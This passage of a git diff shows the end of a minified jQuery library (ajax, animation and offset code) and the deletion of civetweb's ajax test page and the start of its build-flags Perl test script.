\t]*([^\r\n]*)\r?$/mg,bI=/^(?:color|date|datetime|datetime-local|email|hidden|month|number|password|range|search|tel|text|time|url|week)$/i,bJ=/^(?:about|app|app\-storage|.+\-extension|file|res|widget):$/,bK=/^(?:GET|HEAD)$/,bL=/^\/\//,bM=/\?/,bN=/<script\b[^<]*(?:(?!<\/script>)<[^<]*)*<\/script>/gi,bO=/^(?:select|textarea)/i,bP=/\s+/,bQ=/([?&])_=[^&]*/,bR=/^([\w\+\.\-]+:)(?:\/\/([^\/?#:]*)(?::(\d+))?)?/,bS=f.fn.load,bT={},bU={},bV,bW,bX=["*/"]+["*"];try{bV=e.href}catch(bY){bV=c.createElement("a"),bV.href="",bV=bV.href}bW=bR.exec(bV.toLowerCase())||[],f.fn.extend({load:function(a,c,d){if(typeof a!="string"&&bS)return bS.apply(this,arguments);if(!this.length)return this;var e=a.indexOf(" ");if(e>=0){var g=a.slice(e,a.length);a=a.slice(0,e)}var h="GET";c&&(f.isFunction(c)?(d=c,c=b):typeof c=="object"&&(c=f.param(c,f.ajaxSettings.traditional),h="POST"));var i=this;f.ajax({url:a,type:h,dataType:"html",data:c,complete:function(a,b,c){c=a.responseText,a.isResolved()&&(a.done(function(a){c=a}),i.html(g?f("<div>").append(c.replace(bN,"")).find(g):c)),d&&i.each(d,[c,b,a])}});return this},serialize:function(){return f.param(this.serializeArray())},serializeArray:function(){return this.map(function(){return this.elements?f.makeArray(this.elements):this}).filter(function(){return this.name&&!this.disabled&&(this.checked||bO.test(this.nodeName)||bI.test(this.type))}).map(function(a,b){var c=f(this).val();return c==null?null:f.isArray(c)?f.map(c,function(a,c){return{name:b.name,value:a.replace(bF,"\r\n")}}):{name:b.name,value:c.replace(bF,"\r\n")}}).get()}}),f.each("ajaxStart ajaxStop ajaxComplete ajaxError ajaxSuccess ajaxSend".split(" "),function(a,b){f.fn[b]=function(a){return this.on(b,a)}}),f.each(["get","post"],function(a,c){f[c]=function(a,d,e,g){f.isFunction(d)&&(g=g||e,e=d,d=b);return f.ajax({type:c,url:a,data:d,success:e,dataType:g})}}),f.extend({getScript:function(a,c){return f.get(a,b,c,"script")},getJSON:function(a,b,c){return f.get(a,b,c,"json")},ajaxSetup:function(a,b){b?b_(a,f.ajaxSettings):(b=a,a=f.ajaxSettings),b_(a,b);return a},ajaxSettings:{url:bV,isLocal:bJ.test(bW[1]),global:!0,type:"GET",contentType:"application/x-www-form-urlencoded",processData:!0,async:!0,accepts:{xml:"application/xml, text/xml",html:"text/html",text:"text/plain",json:"application/json, text/javascript","*":bX},contents:{xml:/xml/,html:/html/,json:/json/},responseFields:{xml:"responseXML",text:"responseText"},converters:{"* text":a.String,"text html":!0,"text json":f.parseJSON,"text xml":f.parseXML},flatOptions:{context:!0,url:!0}},ajaxPrefilter:bZ(bT),ajaxTransport:bZ(bU),ajax:function(a,c){function w(a,c,l,m){if(s!==2){s=2,q&&clearTimeout(q),p=b,n=m||"",v.readyState=a>0?4:0;var o,r,u,w=c,x=l?cb(d,v,l):b,y,z;if(a>=200&&a<300||a===304){if(d.ifModified){if(y=v.getResponseHeader("Last-Modified"))f.lastModified[k]=y;if(z=v.getResponseHeader("Etag"))f.etag[k]=z}if(a===304)w="notmodified",o=!0;else try{r=cc(d,x),w="success",o=!0}catch(A){w="parsererror",u=A}}else{u=w;if(!w||a)w="error",a<0&&(a=0)}v.status=a,v.statusText=""+(c||w),o?h.resolveWith(e,[r,w,v]):h.rejectWith(e,[v,w,u]),v.statusCode(j),j=b,t&&g.trigger("ajax"+(o?"Success":"Error"),[v,d,o?r:u]),i.fireWith(e,[v,w]),t&&(g.trigger("ajaxComplete",[v,d]),--f.active||f.event.trigger("ajaxStop"))}}typeof a=="object"&&(c=a,a=b),c=c||{};var d=f.ajaxSetup({},c),e=d.context||d,g=e!==d&&(e.nodeType||e instanceof f)?f(e):f.event,h=f.Deferred(),i=f.Callbacks("once memory"),j=d.statusCode||{},k,l={},m={},n,o,p,q,r,s=0,t,u,v={readyState:0,setRequestHeader:function(a,b){if(!s){var c=a.toLowerCase();a=m[c]=m[c]||a,l[a]=b}return this},getAllResponseHeaders:function(){return s===2?n:null},getResponseHeader:function(a){var c;if(s===2){if(!o){o={};while(c=bH.exec(n))o[c[1].toLowerCase()]=c[2]}c=o[a.toLowerCase()]}return c===b?null:c},overrideMimeType:function(a){s||(d.mimeType=a);return this},abort:function(a){a=a||"abort",p&&p.abort(a),w(0,a);return this}};h.promise(v),v.success=v.done,v.error=v.fail,v.complete=i.add,v.statusCode=function(a){if(a){var b;if(s<2)for(b in a)j[b]=[j[b],a[b]];else b=a[v.status],v.then(b,b)}return this},d.url=((a||d.url)+"").replace(bG,"").replace(bL,bW[1]+"//"),d.dataTypes=f.trim(d.dataType||"*").toLowerCase().split(bP),d.crossDomain==null&&(r=bR.exec(d.url.toLowerCase()),d.crossDomain=!(!r||r[1]==bW[1]&&r[2]==bW[2]&&(r[3]||(r[1]==="http:"?80:443))==(bW[3]||(bW[1]==="http:"?80:443)))),d.data&&d.processData&&typeof d.data!="string"&&(d.data=f.param(d.data,d.traditional)),b$(bT,d,c,v);if(s===2)return!1;t=d.global,d.type=d.type.toUpperCase(),d.hasContent=!bK.test(d.type),t&&f.active++===0&&f.event.trigger("ajaxStart");if(!d.hasContent){d.data&&(d.url+=(bM.test(d.url)?"&":"?")+d.data,delete d.data),k=d.url;if(d.cache===!1){var x=f.now(),y=d.url.replace(bQ,"$1_="+x);d.url=y+(y===d.url?(bM.test(d.url)?"&":"?")+"_="+x:"")}}(d.data&&d.hasContent&&d.contentType!==!1||c.contentType)&&v.setRequestHeader("Content-Type",d.contentType),d.ifModified&&(k=k||d.url,f.lastModified[k]&&v.setRequestHeader("If-Modified-Since",f.lastModified[k]),f.etag[k]&&v.setRequestHeader("If-None-Match",f.etag[k])),v.setRequestHeader("Accept",d.dataTypes[0]&&d.accepts[d.dataTypes[0]]?d.accepts[d.dataTypes[0]]+(d.dataTypes[0]!=="*"?", "+bX+"; q=0.01":""):d.accepts["*"]);for(u in d.headers)v.setRequestHeader(u,d.headers[u]);if(d.beforeSend&&(d.beforeSend.call(e,v,d)===!1||s===2)){v.abort();return!1}for(u in{success:1,error:1,complete:1})v[u](d[u]);p=b$(bU,d,c,v);if(!p)w(-1,"No Transport");else{v.readyState=1,t&&g.trigger("ajaxSend",[v,d]),d.async&&d.timeout>0&&(q=setTimeout(function(){v.abort("timeout")},d.timeout));try{s=1,p.send(l,w)}catch(z){if(s<2)w(-1,z);else throw z}}return v},param:function(a,c){var d=[],e=function(a,b){b=f.isFunction(b)?b():b,d[d.length]=encodeURIComponent(a)+"="+encodeURIComponent(b)};c===b&&(c=f.ajaxSettings.traditional);if(f.isArray(a)||a.jquery&&!f.isPlainObject(a))f.each(a,function(){e(this.name,this.value)});else for(var g in a)ca(g,a[g],c,e);return d.join("&").replace(bD,"+")}}),f.extend({active:0,lastModified:{},etag:{}});var cd=f.now(),ce=/(\=)\?(&|$)|\?\?/i;f.ajaxSetup({jsonp:"callback",jsonpCallback:function(){return f.expando+"_"+cd++}}),f.ajaxPrefilter("json jsonp",function(b,c,d){var e=b.contentType==="application/x-www-form-urlencoded"&&typeof b.data=="string";if(b.dataTypes[0]==="jsonp"||b.jsonp!==!1&&(ce.test(b.url)||e&&ce.test(b.data))){var g,h=b.jsonpCallback=f.isFunction(b.jsonpCallback)?b.jsonpCallback():b.jsonpCallback,i=a[h],j=b.url,k=b.data,l="$1"+h+"$2";b.jsonp!==!1&&(j=j.replace(ce,l),b.url===j&&(e&&(k=k.replace(ce,l)),b.data===k&&(j+=(/\?/.test(j)?"&":"?")+b.jsonp+"="+h))),b.url=j,b.data=k,a[h]=function(a){g=[a]},d.always(function(){a[h]=i,g&&f.isFunction(i)&&a[h](g[0])}),b.converters["script json"]=function(){g||f.error(h+" was not called");return g[0]},b.dataTypes[0]="json";return"script"}}),f.ajaxSetup({accepts:{script:"text/javascript, application/javascript, application/ecmascript, application/x-ecmascript"},contents:{script:/javascript|ecmascript/},converters:{"text script":function(a){f.globalEval(a);return a}}}),f.ajaxPrefilter("script",function(a){a.cache===b&&(a.cache=!1),a.crossDomain&&(a.type="GET",a.global=!1)}),f.ajaxTransport("script",function(a){if(a.crossDomain){var d,e=c.head||c.getElementsByTagName("head")[0]||c.documentElement;return{send:function(f,g){d=c.createElement("script"),d.async="async",a.scriptCharset&&(d.charset=a.scriptCharset),d.src=a.url,d.onload=d.onreadystatechange=function(a,c){if(c||!d.readyState||/loaded|complete/.test(d.readyState))d.onload=d.onreadystatechange=null,e&&d.parentNode&&e.removeChild(d),d=b,c||g(200,"success")},e.insertBefore(d,e.firstChild)},abort:function(){d&&d.onload(0,1)}}}});var cf=a.ActiveXObject?function(){for(var a in ch)ch[a](0,1)}:!1,cg=0,ch;f.ajaxSettings.xhr=a.ActiveXObject?function(){return!this.isLocal&&ci()||cj()}:ci,function(a){f.extend(f.support,{ajax:!!a,cors:!!a&&"withCredentials"in a})}(f.ajaxSettings.xhr()),f.support.ajax&&f.ajaxTransport(function(c){if(!c.crossDomain||f.support.cors){var d;return{send:function(e,g){var h=c.xhr(),i,j;c.username?h.open(c.type,c.url,c.async,c.username,c.password):h.open(c.type,c.url,c.async);if(c.xhrFields)for(j in c.xhrFields)h[j]=c.xhrFields[j];c.mimeType&&h.overrideMimeType&&h.overrideMimeType(c.mimeType),!c.crossDomain&&!e["X-Requested-With"]&&(e["X-Requested-With"]="XMLHttpRequest");try{for(j in e)h.setRequestHeader(j,e[j])}catch(k){}h.send(c.hasContent&&c.data||null),d=function(a,e){var j,k,l,m,n;try{if(d&&(e||h.readyState===4)){d=b,i&&(h.onreadystatechange=f.noop,cf&&delete ch[i]);if(e)h.readyState!==4&&h.abort();else{j=h.status,l=h.getAllResponseHeaders(),m={},n=h.responseXML,n&&n.documentElement&&(m.xml=n),m.text=h.responseText;try{k=h.statusText}catch(o){k=""}!j&&c.isLocal&&!c.crossDomain?j=m.text?200:404:j===1223&&(j=204)}}}catch(p){e||g(-1,p)}m&&g(j,k,m,l)},!c.async||h.readyState===4?d():(i=++cg,cf&&(ch||(ch={},f(a).unload(cf)),ch[i]=d),h.onreadystatechange=d)},abort:function(){d&&d(0,1)}}}});var ck={},cl,cm,cn=/^(?:toggle|show|hide)$/,co=/^([+\-]=)?([\d+.\-]+)([a-z%]*)$/i,cp,cq=[["height","marginTop","marginBottom","paddingTop","paddingBottom"],["width","marginLeft","marginRight","paddingLeft","paddingRight"],["opacity"]],cr;f.fn.extend({show:function(a,b,c){var d,e;if(a||a===0)return this.animate(cu("show",3),a,b,c);for(var g=0,h=this.length;g<h;g++)d=this[g],d.style&&(e=d.style.display,!f._data(d,"olddisplay")&&e==="none"&&(e=d.style.display=""),e===""&&f.css(d,"display")==="none"&&f._data(d,"olddisplay",cv(d.nodeName)));for(g=0;g<h;g++){d=this[g];if(d.style){e=d.style.display;if(e===""||e==="none")d.style.display=f._data(d,"olddisplay")||""}}return this},hide:function(a,b,c){if(a||a===0)return this.animate(cu("hide",3),a,b,c);var d,e,g=0,h=this.length;for(;g<h;g++)d=this[g],d.style&&(e=f.css(d,"display"),e!=="none"&&!f._data(d,"olddisplay")&&f._data(d,"olddisplay",e));for(g=0;g<h;g++)this[g].style&&(this[g].style.display="none");return this},_toggle:f.fn.toggle,toggle:function(a,b,c){var d=typeof a=="boolean";f.isFunction(a)&&f.isFunction(b)?this._toggle.apply(this,arguments):a==null||d?this.each(function(){var b=d?a:f(this).is(":hidden");f(this)[b?"show":"hide"]()}):this.animate(cu("toggle",3),a,b,c);return this},fadeTo:function(a,b,c,d){return this.filter(":hidden").css("opacity",0).show().end().animate({opacity:b},a,c,d)},animate:function(a,b,c,d){function g(){e.queue===!1&&f._mark(this);var b=f.extend({},e),c=this.nodeType===1,d=c&&f(this).is(":hidden"),g,h,i,j,k,l,m,n,o;b.animatedProperties={};for(i in a){g=f.camelCase(i),i!==g&&(a[g]=a[i],delete a[i]),h=a[g],f.isArray(h)?(b.animatedProperties[g]=h[1],h=a[g]=h[0]):b.animatedProperties[g]=b.specialEasing&&b.specialEasing[g]||b.easing||"swing";if(h==="hide"&&d||h==="show"&&!d)return b.complete.call(this);c&&(g==="height"||g==="width")&&(b.overflow=[this.style.overflow,this.style.overflowX,this.style.overflowY],f.css(this,"display")==="inline"&&f.css(this,"float")==="none"&&(!f.support.inlineBlockNeedsLayout||cv(this.nodeName)==="inline"?this.style.display="inline-block":this.style.zoom=1))}b.overflow!=null&&(this.style.overflow="hidden");for(i in a)j=new f.fx(this,b,i),h=a[i],cn.test(h)?(o=f._data(this,"toggle"+i)||(h==="toggle"?d?"show":"hide":0),o?(f._data(this,"toggle"+i,o==="show"?"hide":"show"),j[o]()):j[h]()):(k=co.exec(h),l=j.cur(),k?(m=parseFloat(k[2]),n=k[3]||(f.cssNumber[i]?"":"px"),n!=="px"&&(f.style(this,i,(m||1)+n),l=(m||1)/j.cur()*l,f.style(this,i,l+n)),k[1]&&(m=(k[1]==="-="?-1:1)*m+l),j.custom(l,m,n)):j.custom(l,h,""));return!0}var e=f.speed(b,c,d);if(f.isEmptyObject(a))return this.each(e.complete,[!1]);a=f.extend({},a);return e.queue===!1?this.each(g):this.queue(e.queue,g)},stop:function(a,c,d){typeof a!="string"&&(d=c,c=a,a=b),c&&a!==!1&&this.queue(a||"fx",[]);return this.each(function(){function h(a,b,c){var e=b[c];f.removeData(a,c,!0),e.stop(d)}var b,c=!1,e=f.timers,g=f._data(this);d||f._unmark(!0,this);if(a==null)for(b in g)g[b]&&g[b].stop&&b.indexOf(".run")===b.length-4&&h(this,g,b);else g[b=a+".run"]&&g[b].stop&&h(this,g,b);for(b=e.length;b--;)e[b].elem===this&&(a==null||e[b].queue===a)&&(d?e[b](!0):e[b].saveState(),c=!0,e.splice(b,1));(!d||!c)&&f.dequeue(this,a)})}}),f.each({slideDown:cu("show",1),slideUp:cu("hide",1),slideToggle:cu("toggle",1),fadeIn:{opacity:"show"},fadeOut:{opacity:"hide"},fadeToggle:{opacity:"toggle"}},function(a,b){f.fn[a]=function(a,c,d){return this.animate(b,a,c,d)}}),f.extend({speed:function(a,b,c){var d=a&&typeof a=="object"?f.extend({},a):{complete:c||!c&&b||f.isFunction(a)&&a,duration:a,easing:c&&b||b&&!f.isFunction(b)&&b};d.duration=f.fx.off?0:typeof d.duration=="number"?d.duration:d.duration in f.fx.speeds?f.fx.speeds[d.duration]:f.fx.speeds._default;if(d.queue==null||d.queue===!0)d.queue="fx";d.old=d.complete,d.complete=function(a){f.isFunction(d.old)&&d.old.call(this),d.queue?f.dequeue(this,d.queue):a!==!1&&f._unmark(this)};return d},easing:{linear:function(a,b,c,d){return c+d*a},swing:function(a,b,c,d){return(-Math.cos(a*Math.PI)/2+.5)*d+c}},timers:[],fx:function(a,b,c){this.options=b,this.elem=a,this.prop=c,b.orig=b.orig||{}}}),f.fx.prototype={update:function(){this.options.step&&this.options.step.call(this.elem,this.now,this),(f.fx.step[this.prop]||f.fx.step._default)(this)},cur:function(){if(this.elem[this.prop]!=null&&(!this.elem.style||this.elem.style[this.prop]==null))return this.elem[this.prop];var a,b=f.css(this.elem,this.prop);return isNaN(a=parseFloat(b))?!b||b==="auto"?0:b:a},custom:function(a,c,d){function h(a){return e.step(a)}var e=this,g=f.fx;this.startTime=cr||cs(),this.end=c,this.now=this.start=a,this.pos=this.state=0,this.unit=d||this.unit||(f.cssNumber[this.prop]?"":"px"),h.queue=this.options.queue,h.elem=this.elem,h.saveState=function(){e.options.hide&&f._data(e.elem,"fxshow"+e.prop)===b&&f._data(e.elem,"fxshow"+e.prop,e.start)},h()&&f.timers.push(h)&&!cp&&(cp=setInterval(g.tick,g.interval))},show:function(){var a=f._data(this.elem,"fxshow"+this.prop);this.options.orig[this.prop]=a||f.style(this.elem,this.prop),this.options.show=!0,a!==b?this.custom(this.cur(),a):this.custom(this.prop==="width"||this.prop==="height"?1:0,this.cur()),f(this.elem).show()},hide:function(){this.options.orig[this.prop]=f._data(this.elem,"fxshow"+this.prop)||f.style(this.elem,this.prop),this.options.hide=!0,this.custom(this.cur(),0)},step:function(a){var b,c,d,e=cr||cs(),g=!0,h=this.elem,i=this.options;if(a||e>=i.duration+this.startTime){this.now=this.end,this.pos=this.state=1,this.update(),i.animatedProperties[this.prop]=!0;for(b in i.animatedProperties)i.animatedProperties[b]!==!0&&(g=!1);if(g){i.overflow!=null&&!f.support.shrinkWrapBlocks&&f.each(["","X","Y"],function(a,b){h.style["overflow"+b]=i.overflow[a]}),i.hide&&f(h).hide();if(i.hide||i.show)for(b in i.animatedProperties)f.style(h,b,i.orig[b]),f.removeData(h,"fxshow"+b,!0),f.removeData(h,"toggle"+b,!0);d=i.complete,d&&(i.complete=!1,d.call(h))}return!1}i.duration==Infinity?this.now=e:(c=e-this.startTime,this.state=c/i.duration,this.pos=f.easing[i.animatedProperties[this.prop]](this.state,c,0,1,i.duration),this.now=this.start+(this.end-this.start)*this.pos),this.update();return!0}},f.extend(f.fx,{tick:function(){var a,b=f.timers,c=0;for(;c<b.length;c++)a=b[c],!a()&&b[c]===a&&b.splice(c--,1);b.length||f.fx.stop()},interval:13,stop:function(){clearInterval(cp),cp=null},speeds:{slow:600,fast:200,_default:400},step:{opacity:function(a){f.style(a.elem,"opacity",a.now)},_default:function(a){a.elem.style&&a.elem.style[a.prop]!=null?a.elem.style[a.prop]=a.now+a.unit:a.elem[a.prop]=a.now}}}),f.each(["width","height"],function(a,b){f.fx.step[b]=function(a){f.style(a.elem,b,Math.max(0,a.now)+a.unit)}}),f.expr&&f.expr.filters&&(f.expr.filters.animated=function(a){return f.grep(f.timers,function(b){return a===b.elem}).length});var cw=/^t(?:able|d|h)$/i,cx=/^(?:body|html)$/i;"getBoundingClientRect"in c.documentElement?f.fn.offset=function(a){var b=this[0],c;if(a)return this.each(function(b){f.offset.setOffset(this,a,b)});if(!b||!b.ownerDocument)return null;if(b===b.ownerDocument.body)return f.offset.bodyOffset(b);try{c=b.getBoundingClientRect()}catch(d){}var e=b.ownerDocument,g=e.documentElement;if(!c||!f.contains(g,b))return c?{top:c.top,left:c.left}:{top:0,left:0};var h=e.body,i=cy(e),j=g.clientTop||h.clientTop||0,k=g.clientLeft||h.clientLeft||0,l=i.pageYOffset||f.support.boxModel&&g.scrollTop||h.scrollTop,m=i.pageXOffset||f.support.boxModel&&g.scrollLeft||h.scrollLeft,n=c.top+l-j,o=c.left+m-k;return{top:n,left:o}}:f.fn.offset=function(a){var b=this[0];if(a)return this.each(function(b){f.offset.setOffset(this,a,b)});if(!b||!b.ownerDocument)return null;if(b===b.ownerDocument.body)return f.offset.bodyOffset(b);var c,d=b.offsetParent,e=b,g=b.ownerDocument,h=g.documentElement,i=g.body,j=g.defaultView,k=j?j.getComputedStyle(b,null):b.currentStyle,l=b.offsetTop,m=b.offsetLeft;while((b=b.parentNode)&&b!==i&&b!==h){if(f.support.fixedPosition&&k.position==="fixed")break;c=j?j.getComputedStyle(b,null):b.currentStyle,l-=b.scrollTop,m-=b.scrollLeft,b===d&&(l+=b.offsetTop,m+=b.offsetLeft,f.support.doesNotAddBorder&&(!f.support.doesAddBorderForTableAndCells||!cw.test(b.nodeName))&&(l+=parseFloat(c.borderTopWidth)||0,m+=parseFloat(c.borderLeftWidth)||0),e=d,d=b.offsetParent),f.support.subtractsBorderForOverflowNotVisible&&c.overflow!=="visible"&&(l+=parseFloat(c.borderTopWidth)||0,m+=parseFloat(c.borderLeftWidth)||0),k=c}if(k.position==="relative"||k.position==="static")l+=i.offsetTop,m+=i.offsetLeft;f.support.fixedPosition&&k.position==="fixed"&&(l+=Math.max(h.scrollTop,i.scrollTop),m+=Math.max(h.scrollLeft,i.scrollLeft));return{top:l,left:m}},f.offset={bodyOffset:function(a){var b=a.offsetTop,c=a.offsetLeft;f.support.doesNotIncludeMarginInBodyOffset&&(b+=parseFloat(f.css(a,"marginTop"))||0,c+=parseFloat(f.css(a,"marginLeft"))||0);return{top:b,left:c}},setOffset:function(a,b,c){var d=f.css(a,"position");d==="static"&&(a.style.position="relative");var e=f(a),g=e.offset(),h=f.css(a,"top"),i=f.css(a,"left"),j=(d==="absolute"||d==="fixed")&&f.inArray("auto",[h,i])>-1,k={},l={},m,n;j?(l=e.position(),m=l.top,n=l.left):(m=parseFloat(h)||0,n=parseFloat(i)||0),f.isFunction(b)&&(b=b.call(a,c,g)),b.top!=null&&(k.top=b.top-g.top+m),b.left!=null&&(k.left=b.left-g.left+n),"using"in b?b.using.call(a,k):e.css(k)}},f.fn.extend({position:function(){if(!this[0])return null;var a=this[0],b=this.offsetParent(),c=this.offset(),d=cx.test(b[0].nodeName)?{top:0,left:0}:b.offset();c.top-=parseFloat(f.css(a,"marginTop"))||0,c.left-=parseFloat(f.css(a,"marginLeft"))||0,d.top+=parseFloat(f.css(b[0],"borderTopWidth"))||0,d.left+=parseFloat(f.css(b[0],"borderLeftWidth"))||0;return{top:c.top-d.top,left:c.left-d.left}},offsetParent:function(){return this.map(function(){var a=this.offsetParent||c.body;while(a&&!cx.test(a.nodeName)&&f.css(a,"position")==="static")a=a.offsetParent;return a})}}),f.each(["Left","Top"],function(a,c){var d="scroll"+c;f.fn[d]=function(c){var e,g;if(c===b){e=this[0];if(!e)return null;g=cy(e);return g?"pageXOffset"in g?g[a?"pageYOffset":"pageXOffset"]:f.support.boxModel&&g.document.documentElement[d]||g.document.body[d]:e[d]}return this.each(function(){g=cy(this),g?g.scrollTo(a?f(g).scrollLeft():c,a?c:f(g).scrollTop()):this[d]=c})}}),f.each(["Height","Width"],function(a,c){var d=c.toLowerCase();f.fn["inner"+c]=function(){var a=this[0];return a?a.style?parseFloat(f.css(a,d,"padding")):this[d]():null},f.fn["outer"+c]=function(a){var b=this[0];return b?b.style?parseFloat(f.css(b,d,a?"margin":"border")):this[d]():null},f.fn[d]=function(a){var e=this[0];if(!e)return a==null?null:this;if(f.isFunction(a))return this.each(function(b){var c=f(this);c[d](a.call(this,b,c[d]()))});if(f.isWindow(e)){var g=e.document.documentElement["client"+c],h=e.document.body;return e.document.compatMode==="CSS1Compat"&&g||h&&h["client"+c]||g}if(e.nodeType===9)return Math.max(e.documentElement["client"+c],e.body["scroll"+c],e.documentElement["scroll"+c],e.body["offset"+c],e.documentElement["offset"+c]);if(a===b){var i=f.css(e,d),j=parseFloat(i);return f.isNumeric(j)?j:i}return this.css(d,typeof a=="string"?a:a+"px")}}),a.jQuery=a.$=f,typeof define=="function"&&define.amd&&define.amd.jQuery&&define("jquery",[],function(){return f})})(window);
\ No newline at end of file
diff --git a/thirdparty/civetweb-1.10/test/ajax/test.html b/thirdparty/civetweb-1.10/test/ajax/test.html
deleted file mode 100644
index 40fa079..0000000
--- a/thirdparty/civetweb-1.10/test/ajax/test.html
+++ /dev/null
@@ -1,168 +0,0 @@
-<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

-<html>

-  <head>

-    <title>Test</title>

-    <script type='text/javascript' language="javascript" src='jquery.js'></script>

-    <script type='text/javascript' language="javascript">

-    <!--

-

-    function mbox() {

-      alert('Javascript OK');

-    }

-

-

-    var totalCount = 10;

-    var pendingCount = 0;

-    var errorCount = 0;

-    var pushCount = 0;

-    var allErrorCount = 0;

-    var autoTest = false;

-    var testType = "cgi";

-

-    function NextTestType() {

-      if (testType == "cgi") testType = "lp";

-      else if (testType == "lp") testType = "lua";

-      else testType = "cgi";

-    }

-

-    function runTest(method, isAsync) {

-

-      ++pushCount;

-      document.getElementById('start').innerHTML = 'Test: ' + pushCount;

-      document.getElementById('resTotal').innerHTML = 'running';

-

-      for (var i = 1; i <= totalCount; ++i) {

-        document.getElementById('res'+i).innerHTML = "ready";

-      }

-

-      errorCount = 0;

-      pendingCount = totalCount;

-

-      for (var i = 1; i <= totalCount; ++i) {

-

-        fetch(i,  method, isAsync);

-      }

-    }

-    

-    function runAutoTest() {

-      if (autoTest) {

-        runTest("POST", true)

-        setTimeout("runAutoTest()", 250)

-      }

-    }

-

-

-    function fetch(id, method, isAsync) {

-

-      document.getElementById('res'+id).innerHTML = "pending";

-

-      $.ajax({

-        async: isAsync,

-        url: 'echo.' + testType + '?id=' + id,

-        type: method,

-        timeout: 2000,

-        data: { 'id' : id ,

-                'longText1' : "adfsdfasdklkjlgasfdfjkhq345sdafbmkanq3trsdghkjqw4etrjlkabsdfkabvauiregtlkjasdbvabl4btrjawebbfjsdhbjk342r5bjksdbfkljbhasdfbhj234qjhasdg76k11234jhv900adfasddsfmzasdfhjgajsvhgkjhasdf77aefcae4fkjzasdfgukeaf7dkkegasdfigjcvxgui",

-                'longText2' : "bsdfsdfasdklkjlgasdfjkhq345sdafbmkanq3trsdghkjqw4etrjlkabsdfkabvauiregtlkjasdbvabl4btrjawebbfjsdhbjk342r5bjksdbfkljbhasdfbhj234qjhasdg76k11234jhv900adfasddsfmzasdfhjgajsvhgkjhasdf77aefcae4fkjzasdfgukeaf7dkkegasdfigjcvxgui",

-                'longText3' : "sdfsadagsdklkjlgasdfjkhq345sdafbmkanq3trsdghkjqw4etrjlkabsdfkabvauiregtlkjasdbvabl4btrjawebbfjsdhbjk342r5bjksdbfkljbhasdfbhj234qjhasdg76k11234jhv900adfasddsfmzasdfhjgajsvhgkjhasdf77aefcae4fkjzasdfgukeaf7dkkegasdfigjcvxgui",

-                'longText4' : "q34sdfas3fhbkjlgasdfjkhq345sdafbmkanq3trsdghkjqw4etrjlkabsdfkabvauiregtlkjasdbvabl4btrjawebbfjsdhbjk342r5bjksdbfkljbhasdfbhj234qjhasdg76k11234jhv900adfasddsfmzasdfhjgajsvhgkjhasdf77aefcae4fkjzasdfgukeaf7dkkegasdfigjcvxgui",

-                'longText5' : "askj2kjcvxychklgasdfjkhq345sdafbmkanq3trsdghkjqw4etrjlkabsdfkabvauiregtlkjasdbvabl4btrjawebbfjsdhbjk342r5bjksdbfkljbhasdfbhj234qjhasdg76k11234jhv900adfasddsfmzasdfhjgajsvhgkjhasdf77aefcae4fkjzasdfgukeaf7dkkegasdfigjcvxgui",

-                'longText6' : "asdfjklhlkjhv8öajsdfjkhq345sdafbmkanq3trsdghkjqw4etrjlkabsdfkabvauiregtlkjasdbvabl4btrjawebbfjsdhbjk342r5bjksdbfkljbhasdfbhj234qjhasdg76k11234jhv900adfasddsfmzasdfhjgajsvhgkjhasdf77aefcae4fkjzasdfgukeaf7dkkegasdfigjcvxgui",

-                'async' : isAsync

-              },

-        dataType: 'json',

-        succes: function(data) {

-        },

-        error: function() {

-          ++errorCount;

-        },

-        complete: function(jqXHR, textStatus) {

-

-          --pendingCount;

-

-          document.getElementById('res'+id).innerHTML = textStatus;

-          console.log('id: ' + id + ' (' + pendingCount + '/' + totalCount + '), status: ' + textStatus);

-

-          if (pendingCount == 0) {

-            document.getElementById('resTotal').innerHTML = 'done';

-            console.log('complete, error count: ' + errorCount);

-            allErrorCount = allErrorCount + errorCount;

-            document.getElementById('resSAll').innerHTML = 'total errors: ' + allErrorCount + "/" + (pushCount*totalCount);

-          }

-        }

-      });

-

-    }

-

-

-    //-->

-    </script>

-

-  </head>

-  <body>

-    <p>

-      <div id="start">Test not started.</div>

-    </p>

-    <p>

-      <table>

-        <tr>

-          <td>

-            <input id="testButton1" type="button" onclick="javascript:runTest('GET', false)" value="sync GET"></input>

-          </td>

-          <td>

-            <input id="testButton2" type="button" onclick="javascript:runTest('POST', false)" value="sync POST"></input>

-          </td>

-        </tr>

-        <tr>

-          <td>

-            <input id="testButton3" type="button" onclick="javascript:runTest('GET', true)" value="async GET"></input>

-          </td>

-          <td>

-            <input id="testButton4" type="button" onclick="javascript:runTest('POST', true)" value="async POST"></input>

-          </td>

-        </tr>

-        <tr>

-          <td>

-            <input id="testButton5" type="button" onclick="autoTest=!autoTest; javascript:runAutoTest()" value="automatic test"></input>

-          </td>        

-          <td>

-            <input id="testButton6" type="button" onclick="NextTestType(); this.value=testType" value='cgi'></input>

-          </td>        

-        </tr>

-        

-        <tr>

-          <td>

-            <input id="testButtonReset" type="button" onclick="autoTest=false; javascript:location.reload(true)" value="reset"></input>

-          </td>

-          <td>

-            <input id="testButtonBack" type="button" onclick="history.back()" value="back"></input>

-          </td>

-        </tr>

-        <tr>

-          <td>

-            <input id="testButtonBox" type="button" onclick="javascript:mbox()" value="MsgBox"></input>            

-          </td>

-          <td>

-          </td>

-        </tr>

-      </table>

-    </p>

-    <p>

-      <table border="1">

-        <tr><th>Test</th><th>Result</th></tr>

-        <tr><td>1</td><td><div id="res1">not started</div></td></tr>

-        <tr><td>2</td><td><div id="res2">not started</div></td></tr>

-        <tr><td>3</td><td><div id="res3">not started</div></td></tr>

-        <tr><td>4</td><td><div id="res4">not started</div></td></tr>

-        <tr><td>5</td><td><div id="res5">not started</div></td></tr>

-        <tr><td>6</td><td><div id="res6">not started</div></td></tr>

-        <tr><td>7</td><td><div id="res7">not started</div></td></tr>

-        <tr><td>8</td><td><div id="res8">not started</div></td></tr>

-        <tr><td>9</td><td><div id="res9">not started</div></td></tr>

-        <tr><td>10</td><td><div id="res10">not started</div></td></tr>

-      </table>

-      <div id="resTotal">Push [Test] to start.</div>

-      <div id="resSAll"></div>

-    </p>

-  </body>

-</html>

diff --git a/thirdparty/civetweb-1.10/test/all_build_flags.pl b/thirdparty/civetweb-1.10/test/all_build_flags.pl
deleted file mode 100755
index ee225f9..0000000
--- a/thirdparty/civetweb-1.10/test/all_build_flags.pl
+++ /dev/null
@@ -1,28 +0,0 @@
-#!/usr/bin/env perl
-
-@flags = ("NO_POPEN", "NO_SSL", "NDEBUG", "DEBUG", "NO_CGI");
